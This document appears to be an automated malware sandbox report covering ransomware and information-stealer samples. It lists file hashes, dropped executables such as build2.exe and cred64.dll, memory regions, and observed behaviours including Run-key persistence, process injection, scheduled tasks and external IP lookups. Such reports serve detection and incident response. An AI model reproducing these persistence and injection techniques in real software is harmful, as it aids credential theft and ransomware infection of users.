| SHA256 | 2cc9d3a1b9cd79413a4b9698faa0d98032fe9a714ffed6888da320aba7a291c6 |
| SHA512 | f41edb81f27cbeb0abae0171d3bcc3335c802bf7bafaeb5477e215e4e0c400821a988746cbbc8501c41b4eb416ffeef32cdf66450b5c9e61eb8fcc44af4c62b7 |
C:\Users\Admin\AppData\Local\Temp\Cab8739.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
memory/1820-82-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-83-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-87-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-89-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-90-0x0000000000400000-0x0000000000537000-memory.dmp
\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
| MD5 | 47704f454af8641dac1af2e2768d7881 |
| SHA1 | e3341bfdec84f69684aecde18cab2864519c7728 |
| SHA256 | a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64 |
| SHA512 | 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25 |
memory/3016-107-0x0000000000400000-0x0000000000644000-memory.dmp
memory/660-112-0x0000000000230000-0x0000000000261000-memory.dmp
memory/3016-111-0x0000000000400000-0x0000000000644000-memory.dmp
memory/660-110-0x0000000000896000-0x00000000008B2000-memory.dmp
memory/1820-103-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3016-105-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3016-113-0x0000000000400000-0x0000000000644000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TarA22A.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\TarA413.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
| MD5 | 41b883a061c95e9b9cb17d4ca50de770 |
| SHA1 | 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad |
| SHA256 | fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408 |
| SHA512 | cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319 |
memory/1820-181-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3016-183-0x0000000000400000-0x0000000000644000-memory.dmp
memory/2524-186-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2980-188-0x0000000000980000-0x0000000000A80000-memory.dmp
memory/2524-189-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2980-190-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2524-193-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2524-195-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\D55B.exe
| MD5 | 9e52aa572f0afc888c098db4c0f687ff |
| SHA1 | ef7c2bb222e69ad0e10c8686eb03dcbee7933c2b |
| SHA256 | 4a40f9d491f09521f4b0c6076a0eb488f6d8e1cf4b67aa6569c2ccce13556443 |
| SHA512 | d0991e682ae8c954721e905753b56c01f91b85313beb9996331793c3efa8acc13d574ef5ba44853ecc3e05822931ed655bad1924fa11b774a43e015f42185f62 |
memory/2868-211-0x0000000000260000-0x0000000000F45000-memory.dmp
memory/2868-216-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/2868-219-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/2868-218-0x0000000000260000-0x0000000000F45000-memory.dmp
memory/2868-221-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/2868-222-0x0000000000100000-0x0000000000101000-memory.dmp
memory/2868-224-0x0000000000100000-0x0000000000101000-memory.dmp
memory/2868-226-0x0000000000100000-0x0000000000101000-memory.dmp
memory/2868-229-0x0000000000110000-0x0000000000111000-memory.dmp
memory/2868-231-0x0000000000110000-0x0000000000111000-memory.dmp
memory/2868-234-0x0000000000120000-0x0000000000121000-memory.dmp
memory/2868-236-0x0000000000120000-0x0000000000121000-memory.dmp
\Users\Admin\AppData\Local\Temp\D55B.exe
| MD5 | d93e4dc19c2cd25d6bfd3fff6f2b27af |
| SHA1 | 3dce53a7800b1e82b9f4f2f6011e94bddd5fc3cb |
| SHA256 | 40ce345534f5f07cd01d1a5612577f53a991d9d7bc76f7c0f44d53b08e59c51d |
| SHA512 | a98024b3a381f11b40030509539211cf4bc8f9ab8ed6a368644e865bcccd8b498f53e6ba74a0db2c3d4b383aba9ddaee93be4efde0e22fa1c4a9c240712a2902 |
\Users\Admin\AppData\Local\Temp\D55B.exe
| MD5 | aa446655b3ddadb20daa89ed5306b3a2 |
| SHA1 | 76b29972397c9e716108c530558326e0b18b38fb |
| SHA256 | 858c1b15c0e9ac57b343cd72bfc3592b3a5716fbc59ced1b3bca3455f1634c4d |
| SHA512 | 45e8be7eed7e8c535e92cebed7e09f1ecda7dc99d09bb22f9d3c600f68f86c6633c64c17920aee7a98813d544a60f4e614e70b054bc6ff1cd788a086f60f04e8 |
\Users\Admin\AppData\Local\Temp\D55B.exe
| MD5 | a4547c6ffa08aecc8b00ac617283e884 |
| SHA1 | 199437df98dac1e64ac59caaa965616e0853a1b6 |
| SHA256 | 2344b653d3577a1c78171c099aaa2505d23fb024d5b5af10c728c2402e02a592 |
| SHA512 | f09244a93ab44a2d7d2873d4815b5ebcc2e0eea7ba566c92b289c8720af7b9c038ef3808d6225cdbeaab8b1d305a6815f6b4fbab294a878d0c59ce02d4cab7e0 |
memory/2868-250-0x0000000000150000-0x0000000000151000-memory.dmp
\Users\Admin\AppData\Local\Temp\F31A.exe
| MD5 | a38d4abfcf2cc15bf220cc32fc21c448 |
| SHA1 | 35b19554c2adb7caed0183e0fdefd1765a421e57 |
| SHA256 | 5d36c7f8436f72c6d9e67b290c65b5d21ae4a5e30ff30143f5ac1742b7fafe05 |
| SHA512 | e578b32168fd153a703ded21197fbefdd8b4357c4c3978edf84738ffa928ad278421fd7ea2feb2a3cebf13261b5a2bffcca95594a34f1fb52d3490138afc36fb |
C:\Users\Admin\AppData\Local\Temp\F31A.exe
| MD5 | 739a567bcbb5d444c31fc45e80c2ffad |
| SHA1 | 353b43fb544edc32af852a3c9ab560ba90ddc05e |
| SHA256 | ee9edc2473cee323a9cb867d196fc53d8049d21e357d316f8cb7a43c02f36993 |
| SHA512 | 2908f1429b596a1fa71fc7b47600cf54212fa622dc82eb019c45cdf638453a968c36b9abf22609303693c6dd03e482758e177dc58211dc1f6c179e00d4eb0f38 |
memory/1032-264-0x00000000009B0000-0x0000000000AB0000-memory.dmp
memory/2980-262-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2868-272-0x0000000000260000-0x0000000000F45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3F18.exe
| MD5 | f0c94dddfe48fc59e16292085f2a1dec |
| SHA1 | 53d5fc078a95d82f980ceda525b9e1bfa84cc0a2 |
| SHA256 | 144533d2a305451c2c3c60ecd273f5745c8949d3aa55a26655e7a696528202ba |
| SHA512 | 6b86919e458fd33b9903c5c6c65d52df068cade688d9bb393a432cc14e5b063e87aa2c1e9655bcae4cd312fb1d323da116b75357527fe53a064b487a1d94b20b |
C:\Users\Admin\AppData\Local\Temp\3F18.exe
| MD5 | f7ca612af421d5246bff466f9f646b2c |
| SHA1 | 7ceed481d264879f5f54bc5b048c31d76aa4879a |
| SHA256 | a1e2c4eee561c36d64b88d9f25914e0af39a2265cb69a1b4d572fe38cb5ffcfd |
| SHA512 | e1e529293d4bd96e630edde518d9f1e383983c7b8f4509219363142e2530b1dfd275a6ffccda6a298cd1817d663a7959a1d085fe8fc677d7a22b639dca0286d0 |
memory/1524-281-0x0000000001280000-0x0000000001722000-memory.dmp
memory/1524-282-0x0000000077670000-0x0000000077672000-memory.dmp
memory/1524-285-0x0000000000A50000-0x0000000000A51000-memory.dmp
memory/1524-286-0x0000000000CD0000-0x0000000000CD1000-memory.dmp
memory/1524-284-0x0000000000C50000-0x0000000000C51000-memory.dmp
memory/1524-283-0x0000000000BF0000-0x0000000000BF2000-memory.dmp
memory/1524-288-0x0000000000A00000-0x0000000000A01000-memory.dmp
memory/1524-287-0x0000000000990000-0x0000000000991000-memory.dmp
memory/1524-290-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
memory/1524-289-0x0000000000A60000-0x0000000000A61000-memory.dmp
memory/1524-291-0x0000000000940000-0x0000000000941000-memory.dmp
memory/1524-292-0x00000000009A0000-0x00000000009A1000-memory.dmp
memory/1524-293-0x0000000001280000-0x0000000001722000-memory.dmp
memory/1524-294-0x00000000008D0000-0x00000000008D1000-memory.dmp
memory/1524-296-0x00000000009F0000-0x00000000009F1000-memory.dmp
memory/1524-297-0x0000000000DE0000-0x0000000000DE1000-memory.dmp
memory/1524-298-0x00000000008E0000-0x00000000008E1000-memory.dmp
memory/1524-299-0x0000000001270000-0x0000000001271000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\463A.exe
| MD5 | 0de19cd17462ea79db1a5e5fd1d7f59f |
| SHA1 | d2b313dcfbda9a04475fc01182336b52846bbe3b |
| SHA256 | c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b |
| SHA512 | 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c |
C:\Users\Admin\AppData\Local\Temp\3F18.exe
| MD5 | 22b21bd1bb31df3cb3a23895d72d3cca |
| SHA1 | dd60134aa21c226e52fa6bad9965ec47369e013a |
| SHA256 | 9e7f9056ed055f0163d75e314faaaba40d5e7fd4e02c9b40c150420d5a432f69 |
| SHA512 | 38a4bf25f59c553794a863e6e540a33b921c380459cf8ee4586c21589c7ffbe7ff36d3c6875703d6777a3de43970557928bde90c3f7125eb66eea73cdd24b9d7 |
memory/1524-311-0x0000000001280000-0x0000000001722000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4D8B.exe
| MD5 | f727c0754ddda4ed6354375ab748735b |
| SHA1 | 2ad7d52a12f896817edfe511ec26212580dc5958 |
| SHA256 | 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899 |
| SHA512 | 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3 |
memory/2108-318-0x0000000000830000-0x00000000008CA000-memory.dmp
memory/2108-319-0x0000000072F40000-0x000000007362E000-memory.dmp
memory/340-324-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/340-323-0x0000000000220000-0x000000000028F000-memory.dmp
memory/340-322-0x0000000000910000-0x0000000000A10000-memory.dmp
memory/2108-325-0x0000000009590000-0x00000000095D0000-memory.dmp
memory/2160-333-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/2936-332-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/2160-331-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/2160-334-0x0000000001DE0000-0x0000000001E20000-memory.dmp
memory/2936-335-0x0000000002280000-0x00000000022C0000-memory.dmp
memory/2936-337-0x0000000002280000-0x00000000022C0000-memory.dmp
memory/2936-338-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/340-339-0x00000000008E0000-0x00000000008E1000-memory.dmp
memory/340-353-0x0000000000910000-0x0000000000A10000-memory.dmp
memory/340-354-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/2160-356-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/2936-355-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/1828-360-0x0000000000680000-0x0000000000780000-memory.dmp
memory/1828-361-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/2108-371-0x0000000072F40000-0x000000007362E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\650401615101
| MD5 | 29d3383c235bc3061c5b17767ca03ca7 |
| SHA1 | c67b916e63fb47d59b6e278582a2c7e4c095ebcf |
| SHA256 | 402521c872f6fd098b481ce293ccc5f4efeb2d6357c7e11be5857934e96883cc |
| SHA512 | 3d83969eae3b149011b62469db0da7c2978d03521605d4c3ed5544ad006e87da5c7d295b95258aa82e7b0707457f1e734d9c3f4c4f57705b5762ddcdc3b5ba54 |
C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | cb253bf8a6859eadd30b4ceb66c6a588 |
| SHA1 | 7e9383d51ec36a019b5884f79a2ac2c05b4049bd |
| SHA256 | 03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722 |
| SHA512 | 1291d53ee1e025889a6d2bb222eac940c4ba73ae22fd956cbc8c9e61fcc0f78c96a5277362750a5e168ab5a02b46d5d11defaca0956eae08ad546ec529a3e061 |
C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | ea714a90e8e8d71a6071e03019c262f4 |
| SHA1 | 7572c34d6515710b15d6e1db8ec7f1882859107e |
| SHA256 | b27d89c4d824903556d6f31c2168d171b803daae90c01257b0fb76f8448140a3 |
| SHA512 | c6a37c6f932e3e372e0deac92bc33fe5ca61b26ca01d5fe7caf45e4077981bb61cffbf7383fdd850e8fa675de4a8254c42d522b4b25f30094da9bd9d353d7724 |
\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | 58783e32d609b3420b0caca7d5eb106e |
| SHA1 | 6f091cb1fed8645ea56940c46de14b1c9012faff |
| SHA256 | 6a4b7731cefe60974b947ccd6f0c668962086ed89db1e580f99826dcb7fe5de7 |
| SHA512 | e641220787688756ca56189f50dcfcfa722e4c6177c054963c1f2deb0395b6f191c2cf691d5cae4fa95793cfc81fbe8c08b8c37129945ab5b975092fc4fbcb6c |
\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | 5d704f986a395b5f2678f61607eac6a9 |
| SHA1 | 6c92032bd4de36ff08cef4f0d3a567fda5e3a240 |
| SHA256 | 3a868d5273802c26f0844c8c92db0e91d70b9d5e8921aa44090a6ce3db2a68ec |
| SHA512 | 2a4979a5e3b5ac1ddbb35438825bb8c345ff939a1916a45076986d8efb9bd08fafde38eb1daa6c1ffea7d64330d9a8a1ed10b62df36a79af3ad2f46ca15963ea |
\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | 362f796939437d943cb1987096a0e546 |
| SHA1 | 00a9f0be3bf1dffbe8f4afd82493c9012d32c732 |
| SHA256 | 051a1685f8563008ec5be46ff8d02ad3df178d1273d0eb5e8a6692ad36d2da68 |
| SHA512 | f947cc63f53d3ce6e1fdc61ee73bc6b9c040a2845746e17fb8b4d2656f18e16c88155925971348f4241fc64412879196449f66bcca625f26d9801866aa572fd8 |
memory/2108-396-0x0000000009590000-0x00000000095D0000-memory.dmp
memory/308-399-0x0000000010000000-0x0000000010253000-memory.dmp
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 646474805e0a482a64c8fb0fd24cc193 |
| SHA1 | e0f3f06273ece606c9f652b446473dcc90525279 |
| SHA256 | a35b75ae6391b97d77245a8f880ea94d31491c82b6856752a1351f58bcc965bd |
| SHA512 | b0fb54455c5e9d20f61d9aef49969d9fb84fe89fde53ea42b4b01f4822a61308018a054c16277da6b8d91b3219c55deeaf8f568ac5a7b049e3aa2b6f64d53fb0 |
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | fe17a11e16a4d19d2eeb2a5ec43f0af4 |
| SHA1 | de72611f201f3db4aa0d89bffab5b63bdc7a1895 |
| SHA256 | 14a3e2ff433e197099978da1ac9b1cab0a6dd99a0dadde38a6696614ce349107 |
| SHA512 | 1a6cc018e223ca0896f3d72023c1f6907d3e103f2fafb23c08d5c0a4a551d5e95cb11468482eba9dcfddc8bfc073316b7854faf6cca3af17069cb007ba5d2903 |
\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 4876ee75ce2712147c41ff1277cd2d30 |
| SHA1 | 3733dc92318f0c6b92cb201e49151686281acda6 |
| SHA256 | bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed |
| SHA512 | 9bf25d4d0dfebd287b0c84abb64612b3db00a26b0217490b35925e77487d6c872632c936cedf1205c46ecbf9d4dfc9bc7600bee05afc550b30ae0d0964c5afe9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F40GDP7G8DKU5CA6L297.temp
| MD5 | 15c5b56061b272e6034676f253ad2173 |
| SHA1 | 035ae77b6861ed7867d0a4ffcb7ce9ceb9779fca |
| SHA256 | 4477b5a2da2a2ab427a595009af7276d888072a6cdbb9a4e3870e3ba3172131d |
| SHA512 | d6bbb09f0d3a2815852116126163c3ec9eabcef4aaa634a7400ac3857a39596cf818f0217f85519971643350ff488aa0e5fb3ad64aadda5202e50e9ecc758ef0 |
memory/1828-419-0x0000000000680000-0x0000000000780000-memory.dmp
memory/1828-424-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/2852-425-0x000000001B380000-0x000000001B662000-memory.dmp
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll
| MD5 | ca684dc5ebed4381701a39f1cc3a0fb2 |
| SHA1 | 8c4a375aa583bd1c705597a7f45fd18934276770 |
| SHA256 | b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2 |
| SHA512 | 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-15 01:10
Reported
2024-03-15 01:15
Platform
win10-20240221-en
Max time kernel
300s
Max time network
299s
Command Line
Signatures
DcRat
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ab53deb9-ed78-4480-8153-4fc7e31f7c86\\1384.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Lumma Stealer
SmokeLoader
Stealc
Vidar
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2335.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CDA.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B352.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\343B.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\343B.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ab53deb9-ed78-4480-8153-4fc7e31f7c86\\1384.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2936 set thread context of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | C:\Users\Admin\AppData\Local\Temp\1384.exe |
| PID 1400 set thread context of 4064 | N/A | C:\Users\Admin\AppData\Local\Temp\2335.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4652 set thread context of 608 | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | C:\Users\Admin\AppData\Local\Temp\1384.exe |
| PID 1232 set thread context of 2232 | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe |
| PID 4204 set thread context of 4796 | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe |
| PID 3376 set thread context of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\343B.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
